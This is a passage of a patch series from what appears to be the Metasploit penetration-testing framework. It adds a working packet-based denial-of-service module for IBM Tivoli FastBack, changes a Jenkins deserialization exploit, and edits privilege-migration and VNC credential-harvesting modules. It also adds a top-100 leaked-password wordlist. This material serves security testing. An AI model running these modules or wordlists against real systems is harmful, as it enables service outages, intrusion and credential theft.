@state[:proto] + service_info[:name] = @state[:service_name] + @state[:service_object] = db_report(:service, service_info) + end + + def report_vuln + return unless @state[:service_object] + return unless @state[:vuln_name] + return unless @state[:issue_detail] + return unless @state[:refs] + vuln_info = {} + vuln_info[:service_id] = @state[:service_object].id + vuln_info[:host] = @state[:host] + vuln_info[:name] = @state[:vuln_name] + vuln_info[:info] = @state[:issue_detail] + vuln_info[:refs] = @state[:refs] + @state[:vuln_object] = db_report(:vuln, vuln_info) + end + + def in_issue + return false unless in_tag("issue") + return false unless in_tag("issues") + return true + end + + def has_text + return false unless @text + return false if @text.strip.empty? + @text = @text.strip + end + end + + end +end + diff --git a/lib/rex/parser/burp_session_nokogiri.rb b/lib/rex/parser/burp_session_nokogiri.rb index 2822fa28bf..057c5dae53 100644 --- a/lib/rex/parser/burp_session_nokogiri.rb +++ b/lib/rex/parser/burp_session_nokogiri.rb @@ -157,7 +157,7 @@ module Rex host_info = {:workspace => @args[:wspace]} host_info[:address] = @state[:web_site].service.host.address host_info[:name] = @state[:uri].host - report_db(:host, host_info) + db_report(:host, host_info) end def report_web_service_info diff --git a/lib/rex/parser/nokogiri_doc_mixin.rb b/lib/rex/parser/nokogiri_doc_mixin.rb index bfee26fa8c..9e59c56061 100644 --- a/lib/rex/parser/nokogiri_doc_mixin.rb +++ b/lib/rex/parser/nokogiri_doc_mixin.rb @@ -200,6 +200,11 @@ module Parser return attr_pairs end + # Removes HTML from a string + def strip_html_tags(text) + return text.gsub!(/(<[^>]*>)|\n|\t/s) {" "} + end + # This breaks xml-encoded characters, so need to append. # It's on the end_element tag name to turn the appending # off and clear out the data. diff --git a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb index 66a8edcde3..28605ad12b 100644 --- a/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb +++ b/spec/lib/msf/ui/console/command_dispatcher/db_spec.rb @@ -340,6 +340,7 @@ RSpec.describe Msf::Ui::Console::CommandDispatcher::Db do " Amap Log", " Amap Log -m", " Appscan", + " Burp Issue XML", " Burp Session XML", " CI", " Foundstone", From 54566823f58d1650bd9675dd88cce4eb864c6f53 Mon Sep 17 00:00:00 2001 From: William Webb <william_webb@rapid7.com> Date: Mon, 8 Feb 2016 14:36:14 -0600 Subject: [PATCH 37/71] Add IBM TSM Fastback denial of service module --- modules/exploits/windows/misc/ibm_tsm_dos.rb | 96 ++++++++++++++++++++ 1 file changed, 96 insertions(+) create mode 100644 modules/exploits/windows/misc/ibm_tsm_dos.rb diff --git a/modules/exploits/windows/misc/ibm_tsm_dos.rb b/modules/exploits/windows/misc/ibm_tsm_dos.rb new file mode 100644 index 0000000000..9d49daf331 --- /dev/null +++ b/modules/exploits/windows/misc/ibm_tsm_dos.rb @@ -0,0 +1,96 @@ +## +# This module requires Metasploit: http://metasploit.com/download +# Current source: https://github.com/rapid7/metasploit-framework +## + +require 'msf/core' + +class Metasploit4 < Msf::Exploit::Remote + Rank = GoodRanking + + include Msf::Exploit::Remote::Tcp + + def initialize(info={}) + super(update_info(info, + 'Name' => "IBM Tivoli Storage Manager FastBack Server Opcode 0x534 Denial of Service", + 'Description' => %q{ + This module exploits a denial of service condition present in IBM Tivoli Storage Manager FastBack Server + when dealing with packets triggering the opcode 0x534 handler + }, + 'License' => MSF_LICENSE, + 'Author' => + [ + 'Gianni Gnesa', # Public disclosure/Proof of Concept + 'William Webb <william_webb[at]rapid7.com>', # Metasploit + ], + 'References' => + [ + ['URL', 'https://www.exploit-db.com/exploits/38979/'] + ], + 'Payload' => + { + 'BadChars' => "\x00", + }, + 'DefaultOptions' => + { + 'DisablePayloadHandler' => 'true', + }, + 'Platform' => 'win', + 'Targets' => + [ + ['IBM Tivoli Storage Manager FastBack Server 5.5.4.2', {}], + ], + 'Privileged' => false, + 'DisclosureDate' => "Dec 15 2015", + 'DefaultTarget' => 0)) + + register_options( + [ + Opt::RPORT(11460) + ], self.class) + end + + def tv_pkt(opcode, p1="", p2="", p3="") + buf = Rex::Text.rand_text_alpha(0x0C) + buf += [opcode].pack("V") + buf += [0x00].pack("V") + buf += [p1.length].pack("V") + buf += [p1.length].pack("V") + buf += [p2.length].pack("V") + buf += [p1.length + p2.length].pack("V") + buf += [p3.length].pack("V") + + buf += Rex::Text.rand_text_alpha(0x08) + + buf += p1 + buf += p2 + buf += p3 + + pkt = [buf.length].pack("N") + pkt << buf + + return pkt + end + + def exploit + ip = datastore['RHOST'] + port = datastore['RPORT'] + + target_opcode = 0x534 + connect + print_status("Connected to: #{datastore['RHOST'].to_s} port: #{datastore['RPORT']}") + print_status("Sending malicious packet") + + p = tv_pkt(target_opcode, + p1 = "File: %s From: %d To: %d ChunkLoc: %d FileLoc: %d" % [Rex::Text.rand_text_alpha(0x200),0,0,0,0], + p2 = Rex::Text.rand_text_alpha(0x60), + p3 = Rex::Text.rand_text_alpha(0x60) + ) + + sock.put(p) + disconnect + print_status("Packet sent!") + rescue ::Exception => ex + print_status("Exploit failed: #{ex.class}: #{ex.message}") + end +end From d60dcf72f9d9a7f891eae83f2a2cf01f46182d7e Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Mon, 8 Feb 2016 18:16:48 -0600 Subject: [PATCH 38/71] Resolve #6546, support manual config for X-Jenkins-CLI-Port Resolve #6546 --- .../exploits/linux/misc/jenkins_java_deserialize.rb | 12 ++++++++++-- 1 file changed, 10 insertions(+), 2 deletions(-) diff --git a/modules/exploits/linux/misc/jenkins_java_deserialize.rb b/modules/exploits/linux/misc/jenkins_java_deserialize.rb index c7eec77106..728dc431f7 100644 --- a/modules/exploits/linux/misc/jenkins_java_deserialize.rb +++ b/modules/exploits/linux/misc/jenkins_java_deserialize.rb @@ -52,10 +52,18 @@ class Metasploit3 < Msf::Exploit::Remote OptString.new('TEMP', [true, 'Folder to write the payload to', '/tmp']), Opt::RPORT('8080') ], self.class) + + register_advanced_options([ + OptPort.new('XJenkinsCliPort', [ false, 'The X-Jenkins-CLI port. If this is set, the TARGETURI option is ignored.']) + ], self.class) + end + + def cli_port + @jenkins_cli_port || datastore['XJenkinsCliPort'] end def exploit - unless vulnerable? + unless cli_port || vulnerable? fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...") end invoke_remote_method(set_payload) @@ -155,7 +163,7 @@ class Metasploit3 < Msf::Exploit::Remote def invoke_remote_method(serialized_java_stream) begin - socket = connect(true, {'RPORT' => @jenkins_cli_port}) + socket = connect(true, {'RPORT' => cli_port}) print_status 'Sending headers...' socket.put(read_bin_file('serialized_jenkins_header')) From 1d6b782cc8d7c1c29ff4cc0dfaa09c90254ad693 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Mon, 8 Feb 2016 18:40:48 -0600 Subject: [PATCH 39/71] Change logic I just can't deal with this "unless" syntax... --- modules/exploits/linux/misc/jenkins_java_deserialize.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/misc/jenkins_java_deserialize.rb b/modules/exploits/linux/misc/jenkins_java_deserialize.rb index 728dc431f7..22ac86212d 100644 --- a/modules/exploits/linux/misc/jenkins_java_deserialize.rb +++ b/modules/exploits/linux/misc/jenkins_java_deserialize.rb @@ -63,7 +63,7 @@ class Metasploit3 < Msf::Exploit::Remote end def exploit - unless cli_port || vulnerable? + if cli_port == 0 && !vulnerable? fail_with(Failure::Unknown, "#{peer} - Jenkins is not vulnerable, aborting...") end invoke_remote_method(set_payload) From eadbb6b58232c5c49c66288826a218f5cb92100e Mon Sep 17 00:00:00 2001 From: William Webb <william_webb@rapid7.com> Date: Tue, 9 Feb 2016 11:44:01 -0600 Subject: [PATCH 40/71] moved module to modules/auxiliary/dos/misc --- .../windows => auxiliary/dos}/misc/ibm_tsm_dos.rb | 10 ++++++---- 1 file changed, 6 insertions(+), 4 deletions(-) rename modules/{exploits/windows => auxiliary/dos}/misc/ibm_tsm_dos.rb (87%) diff --git a/modules/exploits/windows/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb similarity index 87% rename from modules/exploits/windows/misc/ibm_tsm_dos.rb rename to modules/auxiliary/dos/misc/ibm_tsm_dos.rb index 9d49daf331..57fbd58292 100644 --- a/modules/exploits/windows/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -20,7 +20,7 @@ class Metasploit4 < Msf::Exploit::Remote 'License' => MSF_LICENSE, 'Author' => [ - 'Gianni Gnesa', # Public disclosure/Proof of Concept + 'Gianni Gnesa', # Public disclosure/Proof of Concept 'William Webb <william_webb[at]rapid7.com>', # Metasploit ], 'References' => @@ -88,9 +88,11 @@ class Metasploit4 < Msf::Exploit::Remote ) sock.put(p) - disconnect print_status("Packet sent!") - rescue ::Exception => ex - print_status("Exploit failed: #{ex.class}: #{ex.message}") + rescue Rex::AddressInUse, ::Errno::ETIMEDOUT, Rex::HostUnreachable, Rex::ConnectionTimeout, Rex::ConnectionRefused, ::Timeout::Error, ::EOFError => ex + print_status("Exploit failed: #{ex.class} #{ex.message}") + elog("#{ex.class} #{ex.message}\n#{ex.backtrace * "\n"}") + ensure + disconnect end end From 08a41b0a31e1e1ccb420270ee35bded5c9894cc0 Mon Sep 17 00:00:00 2001 From: Josh Hale <jhale85446@gmail.com> Date: Tue, 9 Feb 2016 21:22:50 -0600 Subject: [PATCH 41/71] Fix issue when target PID not owned by session --- modules/post/windows/manage/priv_migrate.rb | 5 ++++- 1 file changed, 4 insertions(+), 1 deletion(-) diff --git a/modules/post/windows/manage/priv_migrate.rb b/modules/post/windows/manage/priv_migrate.rb index 04cba5d6c3..dcf5fbc9ec 100644 --- a/modules/post/windows/manage/priv_migrate.rb +++ b/modules/post/windows/manage/priv_migrate.rb @@ -53,6 +53,7 @@ class Metasploit3 < Msf::Post end # This function returns the first process id of a process with the name provided. + # It will make sure that the process has a visible user meaning that the session has rights to that process. # Note: "target_pid = session.sys.process[proc_name]" will not work when "include Msf::Post::Windows::Priv" is in the module. # # @return [Fixnum] the PID if one is found @@ -60,7 +61,9 @@ class Metasploit3 < Msf::Post def get_pid(proc_name) processes = client.sys.process.get_processes processes.each do |proc| - return proc['pid'] if proc['name'] == proc_name + if proc['name'] == proc_name + return proc['pid'] if proc['user'] != "" + end end return nil end From 4653c271672cd54c76d6db9e187ec466393447c2 Mon Sep 17 00:00:00 2001 From: Josh Hale <jhale85446@gmail.com> Date: Tue, 9 Feb 2016 21:24:40 -0600 Subject: [PATCH 42/71] Fix minor grammar error in description --- modules/post/windows/manage/priv_migrate.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/post/windows/manage/priv_migrate.rb b/modules/post/windows/manage/priv_migrate.rb index dcf5fbc9ec..1d26ad292d 100644 --- a/modules/post/windows/manage/priv_migrate.rb +++ b/modules/post/windows/manage/priv_migrate.rb @@ -20,7 +20,7 @@ class Metasploit3 < Msf::Post It will do everything it can to migrate, including spawing a new User level process. For sessions with Admin rights: It will try to migrate into a System level process in the following order: ANAME (if specified), services.exe, winlogon.exe, wininit.exe, lsm.exe, and lsass.exe. - If al these fail, it will fall back to User level migration. For sessions with User level rights: + If all these fail, it will fall back to User level migration. For sessions with User level rights: It will try to migrate to a user level process, if that fails it will attempt to spawn the process then migrate to it. It will attempt the User level processes in the following order: NAME (if specified), explorer.exe, then notepad.exe.}, From 8a3bc83c4de2fb94c100966e4794a591f04208a7 Mon Sep 17 00:00:00 2001 From: wchen-r7 <wei_chen@rapid7.com> Date: Tue, 9 Feb 2016 21:24:25 -0600 Subject: [PATCH 43/71] Resolve #6553, remove unnecessary content-length header Rex will always generate a content-length header, so the module doesn't have to do this anymore. Resolve #6553 --- modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb | 1 - modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb | 1 - 2 files changed, 2 deletions(-) diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb index 882ea4523a..5b04429e57 100644 --- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb +++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_nameparams.rb @@ -121,7 +121,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Keep-Alive' => '300', 'Connection' => 'Keep-Alive', 'Cache-Control' => 'max-age=0', - 'Content-Length' => data.length, 'Content-Type' => 'application/x-www-form-urlencoded', } }, 3) diff --git a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb index 17dc37c388..5a5e8f9e58 100644 --- a/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb +++ b/modules/exploits/windows/http/hp_nnm_nnmrptconfig_schdparams.rb @@ -82,7 +82,6 @@ class Metasploit3 < Msf::Exploit::Remote 'Keep-Alive' => '300', 'Connection' => 'Keep-Alive', 'Cache-Control' => 'mag-age=0', - 'Content-Length' => data.length, 'Content-Type' => 'application/x-www-form-urlencoded', } }, 3) From c67360f4362a3c3dd09476649942dd92c716b937 Mon Sep 17 00:00:00 2001 From: William Vu <William_Vu@rapid7.com> Date: Wed, 10 Feb 2016 09:44:01 -0600 Subject: [PATCH 44/71] Remove extraneous whitespace --- modules/exploits/linux/misc/jenkins_java_deserialize.rb | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/modules/exploits/linux/misc/jenkins_java_deserialize.rb b/modules/exploits/linux/misc/jenkins_java_deserialize.rb index 22ac86212d..a715ed69ab 100644 --- a/modules/exploits/linux/misc/jenkins_java_deserialize.rb +++ b/modules/exploits/linux/misc/jenkins_java_deserialize.rb @@ -54,7 +54,7 @@ class Metasploit3 < Msf::Exploit::Remote ], self.class) register_advanced_options([ - OptPort.new('XJenkinsCliPort', [ false, 'The X-Jenkins-CLI port. If this is set, the TARGETURI option is ignored.']) + OptPort.new('XJenkinsCliPort', [false, 'The X-Jenkins-CLI port. If this is set, the TARGETURI option is ignored.']) ], self.class) end From 51604fa24a5943d9ae99ebd626d3a90093ed2dc7 Mon Sep 17 00:00:00 2001 From: William Webb <william_webb@rapid7.com> Date: Wed, 10 Feb 2016 10:59:11 -0600 Subject: [PATCH 45/71] made necessary inheritance changes --- modules/auxiliary/dos/misc/ibm_tsm_dos.rb | 5 +++-- 1 file changed, 3 insertions(+), 2 deletions(-) diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb index 57fbd58292..c88a13acf7 100644 --- a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -5,10 +5,11 @@ require 'msf/core' -class Metasploit4 < Msf::Exploit::Remote +class Metasploit4 < Msf::Auxiliary Rank = GoodRanking include Msf::Exploit::Remote::Tcp + include Msf::Auxiliary::Dos def initialize(info={}) super(update_info(info, @@ -72,7 +73,7 @@ class Metasploit4 < Msf::Exploit::Remote return pkt end - def exploit + def run ip = datastore['RHOST'] port = datastore['RPORT'] From 62dd82e65389bf28d01067c8a598fcae583c6c01 Mon Sep 17 00:00:00 2001 From: Josh Hale <jhale85446@gmail.com> Date: Wed, 10 Feb 2016 11:24:45 -0600 Subject: [PATCH 46/71] Make fix easier to read --- modules/post/windows/manage/priv_migrate.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/manage/priv_migrate.rb b/modules/post/windows/manage/priv_migrate.rb index 1d26ad292d..45d2de743d 100644 --- a/modules/post/windows/manage/priv_migrate.rb +++ b/modules/post/windows/manage/priv_migrate.rb @@ -61,8 +61,8 @@ class Metasploit3 < Msf::Post def get_pid(proc_name) processes = client.sys.process.get_processes processes.each do |proc| - if proc['name'] == proc_name - return proc['pid'] if proc['user'] != "" + if proc['name'] == proc_name && proc['user'] != "" + return proc['pid'] end end return nil From 72f5a33804fa266bf4b0d0de1dce07b8609582f0 Mon Sep 17 00:00:00 2001 From: William Webb <william_webb@rapid7.com> Date: Wed, 10 Feb 2016 11:34:05 -0600 Subject: [PATCH 47/71] addressed CI errors --- modules/auxiliary/dos/misc/ibm_tsm_dos.rb | 17 +---------------- 1 file changed, 1 insertion(+), 16 deletions(-) diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb index c88a13acf7..eda0f99700 100644 --- a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -28,22 +28,7 @@ class Metasploit4 < Msf::Auxiliary [ ['URL', 'https://www.exploit-db.com/exploits/38979/'] ], - 'Payload' => - { - 'BadChars' => "\x00", - }, - 'DefaultOptions' => - { - 'DisablePayloadHandler' => 'true', - }, - 'Platform' => 'win', - 'Targets' => - [ - ['IBM Tivoli Storage Manager FastBack Server 5.5.4.2', {}], - ], - 'Privileged' => false, - 'DisclosureDate' => "Dec 15 2015", - 'DefaultTarget' => 0)) + 'DisclosureDate' => "Dec 15 2015")) register_options( [ From 4c6cb03548a4ba3a890f94565cc57888b4ec414c Mon Sep 17 00:00:00 2001 From: William Webb <william_webb@rapid7.com> Date: Wed, 10 Feb 2016 11:40:21 -0600 Subject: [PATCH 48/71] more build errors --- modules/auxiliary/dos/misc/ibm_tsm_dos.rb | 4 +++- 1 file changed, 3 insertions(+), 1 deletion(-) diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb index eda0f99700..3d1443e452 100644 --- a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -28,7 +28,9 @@ class Metasploit4 < Msf::Auxiliary [ ['URL', 'https://www.exploit-db.com/exploits/38979/'] ], - 'DisclosureDate' => "Dec 15 2015")) + 'DisclosureDate' => "Dec 15 2015", + 'DefaultOptions' => {} + )) register_options( [ From c874699b8239105f855a6f011d5e45a89c045590 Mon Sep 17 00:00:00 2001 From: William Webb <william_webb@rapid7.com> Date: Wed, 10 Feb 2016 11:45:09 -0600 Subject: [PATCH 49/71] removed ranking --- modules/auxiliary/dos/misc/ibm_tsm_dos.rb | 1 - 1 file changed, 1 deletion(-) diff --git a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb index 3d1443e452..6d0fc435e0 100644 --- a/modules/auxiliary/dos/misc/ibm_tsm_dos.rb +++ b/modules/auxiliary/dos/misc/ibm_tsm_dos.rb @@ -6,7 +6,6 @@ require 'msf/core' class Metasploit4 < Msf::Auxiliary - Rank = GoodRanking include Msf::Exploit::Remote::Tcp include Msf::Auxiliary::Dos From 1637891ece730168dfb0d3e55d8c363c1a90c700 Mon Sep 17 00:00:00 2001 From: nk <nk@nikaiw.io> Date: Wed, 10 Feb 2016 20:30:41 +0100 Subject: [PATCH 50/71] Add check for the uninstall location in vnc post module --- modules/post/windows/gather/credentials/vnc.rb | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb index a4488e672e..376de77802 100644 --- a/modules/post/windows/gather/credentials/vnc.rb +++ b/modules/post/windows/gather/credentials/vnc.rb @@ -108,6 +108,20 @@ class Metasploit3 < Msf::Post :port_variable => 'PortNumber='} end + #check uninstall key + begin + root_key, base_key = session.sys.registry.splitkey("HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\Ultravnc2_is1") + open_key = session.sys.registry.open_key(root_key,base_key,KEY_READ) + vnclocation = open_key.query_value("InstallLocation").data + locations << {:name => 'UltraVNC', + :check_file => vnclocation + "\\ultravnc.ini", + :pass_variable => 'passwd=', + :viewonly_variable => 'passwd2=', + :port_variable => 'PortNumber='} + rescue + # Registry value not found + end + locations << {:name => 'WinVNC3_HKLM', :check_reg => 'HKLM\\Software\\ORL\\WinVNC3', :pass_variable => 'Password', From 8118198628d739e86d543fca1b6a0ea0045a02ee Mon Sep 17 00:00:00 2001 From: Nicolas Devillers <nk@nikaiw.io> Date: Wed, 10 Feb 2016 22:47:51 +0100 Subject: [PATCH 51/71] Add vprint of the exception message --- modules/post/windows/gather/credentials/vnc.rb | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/modules/post/windows/gather/credentials/vnc.rb b/modules/post/windows/gather/credentials/vnc.rb index 376de77802..040a6a436c 100644 --- a/modules/post/windows/gather/credentials/vnc.rb +++ b/modules/post/windows/gather/credentials/vnc.rb @@ -118,8 +118,8 @@ class Metasploit3 < Msf::Post :pass_variable => 'passwd=', :viewonly_variable => 'passwd2=', :port_variable => 'PortNumber='} - rescue - # Registry value not found + rescue Rex::Post::Meterpreter::RequestError => e + vprint_error(e.message) end locations << {:name => 'WinVNC3_HKLM', From aeb1d80e0d703b1e5baa2d06ce841542c0f8bd5e Mon Sep 17 00:00:00 2001 From: Jay Turla <shipcodez@gmail.com> Date: Thu, 11 Feb 2016 08:55:45 +0800 Subject: [PATCH 52/71] Adding top 100 adobe passwords --- data/wordlists/adobe_top100_pass.txt | 100 +++++++++++++++++++++++++++ 1 file changed, 100 insertions(+) create mode 100644 data/wordlists/adobe_top100_pass.txt diff --git a/data/wordlists/adobe_top100_pass.txt b/data/wordlists/adobe_top100_pass.txt new file mode 100644 index 0000000000..f7d2a744be --- /dev/null +++ b/data/wordlists/adobe_top100_pass.txt @@ -0,0 +1,100 @@ +123456 +123456789 +password +adobe123 +12345678 +qwerty +1234567 +111111 +photoshop +123123 +1234567890 +000000 +abc123 +1234 +adobe1 +macromedia +azerty +iloveyou +aaaaaa +654321 +12345 +666666 +sunshine +123321 +letmein +monkey +asdfgh +password1 +shadow +princess +dragon +adobeadobe +daniel +computer +michael +121212 +charlie +master +superman +qwertyuiop +112233 +asdfasdf +jessica +1q2w3e4r +welcome +1qaz2wsx +987654321 +fdsa +753951 +chocolate +fuckyou +soccer +tigger +asdasd +thomas +asdfghjkl +internet +michelle +football +123qwe +zxcvbnm +dreamweaver +7777777 +maggie +qazwsx +baseball +jennifer +jordan +abcd1234 +trustno1 +buster +555555 +liverpool +abc +whatever +11111111 +102030 +123123123 +andrea +pepper +nicole +killer +abcdef +hannah +test +alexander +andrew +222222 +joshua +freedom +samsung +asdfghj +purple +ginger +123654 +matrix +secret +summer +1q2w3e +snoopy1 From 4ac7c5e298d76bc36f84d352434b581ec5dbe993 Mon Sep 17 00:00:00 2001 From: OJ <oj@buffered.io> Date: Thu, 11 Feb 2016 14:36:17 +1000 Subject: [PATCH 53/71] Updaed the gemspec to point to the new payloads gem --- metasploit-framework.gemspec | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/metasploit-framework.gemspec b/metasploit-framework.gemspec index 60143d3550..32bcb1cd36 100644 --- a/metasploit-framework.gemspec +++ b/metasploit-framework.gemspec @@ -70,7 +70,7 @@ Gem::Specification.new do |spec| # are needed when there's no database spec.add_runtime_dependency 'metasploit-model', '1.0.0' # Needed for Meterpreter - spec.add_runtime_dependency 'metasploit-payloads', '1.0.23' + spec.add_runtime_dependency 'metasploit-payloads', '1.0.24' # Needed by msfgui and other rpc components spec.add_runtime_dependency 'msgpack' # get list of network interfaces, like eth* from OS. From 27ec6a861c3ce34c06c4921139ab464d59cf0af8 Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Wed, 10 Feb 2016 22:41:41 -0600 Subject: [PATCH 54/71] update gemfile.lock --- Gemfile.lock | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/Gemfile.lock b/Gemfile.lock index caab021834..ea2654ff4a 100644 --- a/Gemfile.lock +++ b/Gemfile.lock @@ -13,7 +13,7 @@ PATH metasploit-concern (= 1.0.0) metasploit-credential (= 1.0.1) metasploit-model (= 1.0.0) - metasploit-payloads (= 1.0.23) + metasploit-payloads (= 1.0.24) metasploit_data_models (= 1.2.10) msgpack network_interface (~> 0.0.1) @@ -124,7 +124,7 @@ GEM activemodel (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) railties (>= 4.0.9, < 4.1.0) - metasploit-payloads (1.0.23) + metasploit-payloads (1.0.24) metasploit_data_models (1.2.10) activerecord (>= 4.0.9, < 4.1.0) activesupport (>= 4.0.9, < 4.1.0) From ff1cb4a2a46091c772b13d0715be00c9f994342e Mon Sep 17 00:00:00 2001 From: Brent Cook <bcook@rapid7.com> Date: Wed, 10 Feb 2016 22:44:17 -0600 Subject: [PATCH 55/71] update payload sizes --- modules/payloads/singles/php/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/python/meterpreter_bind_tcp.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_https.rb | 2 +- modules/payloads/singles/python/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/windows/meterpreter_bind_tcp.rb | 2 +- modules/payloads/singles/windows/meterpreter_reverse_http.rb | 2 +- modules/payloads/singles/windows/meterpreter_reverse_https.rb | 2 +- .../payloads/singles/windows/meterpreter_reverse_ipv6_tcp.rb | 2 +- modules/payloads/singles/windows/meterpreter_reverse_tcp.rb | 2 +- modules/payloads/singles/windows/x64/meterpreter_bind_tcp.rb | 2 +- .../payloads/singles/windows/x64/meterpreter_reverse_http.rb | 2 +- .../payloads/singles/windows/x64/meterpreter_reverse_https.rb | 2 +- .../singles/windows/x64/meterpreter_reverse_ipv6_tcp.rb | 2 +- modules/payloads/singles/windows/x64/meterpreter_reverse_tcp.rb | 2 +- 15 files changed, 15 insertions(+), 15 deletions(-) diff --git a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb index fff36fc4d5..df54d255cd 100644 --- a/modules/payloads/singles/php/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/php/meterpreter_reverse_tcp.rb @@ -12,7 +12,7 @@ require 'msf/base/sessions/meterpreter_options' module Metasploit4 - CachedSize = 26205 + CachedSize = 26778 include Msf::Payload::Single include Msf::Payload::Php::ReverseTcp diff --git a/modules/payloads/singles/python/meterpreter_bind_tcp.rb b/modules/payloads/singles/python/meterpreter_bind_tcp.rb index 395962145f..9d61027eca 100644 --- a/modules/payloads/singles/python/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_bind_tcp.rb @@ -12,7 +12,7 @@ require 'msf/base/sessions/meterpreter_python' module Metasploit4 - CachedSize = 50226 + CachedSize = 51062 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_http.rb b/modules/payloads/singles/python/meterpreter_reverse_http.rb index 44369a42a9..f720e147fa 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_http.rb @@ -12,7 +12,7 @@ require 'msf/base/sessions/meterpreter_python' module Metasploit4 - CachedSize = 50190 + CachedSize = 51026 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_https.rb b/modules/payloads/singles/python/meterpreter_reverse_https.rb index efdecac0bc..4e02d4ecf1 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_https.rb @@ -12,7 +12,7 @@ require 'msf/base/sessions/meterpreter_python' module Metasploit4 - CachedSize = 50190 + CachedSize = 51026 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb index 7988da15eb..67d4cbfe69 100644 --- a/modules/payloads/singles/python/meterpreter_reverse_tcp.rb +++ b/modules/payloads/singles/python/meterpreter_reverse_tcp.rb @@ -12,7 +12,7 @@ require 'msf/base/sessions/meterpreter_python' module Metasploit4 - CachedSize = 50146 + CachedSize = 50978 include Msf::Payload::Single include Msf::Payload::Python diff --git a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb index 35cca34308..8f59094b79 100644 --- a/modules/payloads/singles/windows/meterpreter_bind_tcp.rb +++ b/modules/payloads/singles/windows/meterpreter_bind_tcp.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 957487 + CachedSize = 957999 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_http.rb b/modules/payloads/singles/windows/meterpreter_reverse_http.rb index cf8c6f0fd1..488b28e773 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_http.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_http.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 958531 + CachedSize = 959043 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git a/modules/payloads/singles/windows/meterpreter_reverse_https.rb b/modules/payloads/singles/windows/meterpreter_reverse_https.rb index 32fe451235..1782e416cb 100644 --- a/modules/payloads/singles/windows/meterpreter_reverse_https.rb +++ b/modules/payloads/singles/windows/meterpreter_reverse_https.rb @@ -13,7 +13,7 @@ require 'rex/payloads/meterpreter/config' module Metasploit4 - CachedSize = 958531 + CachedSize = 959043 include Msf::Payload::TransportConfig include Msf::Payload::Windows diff --git 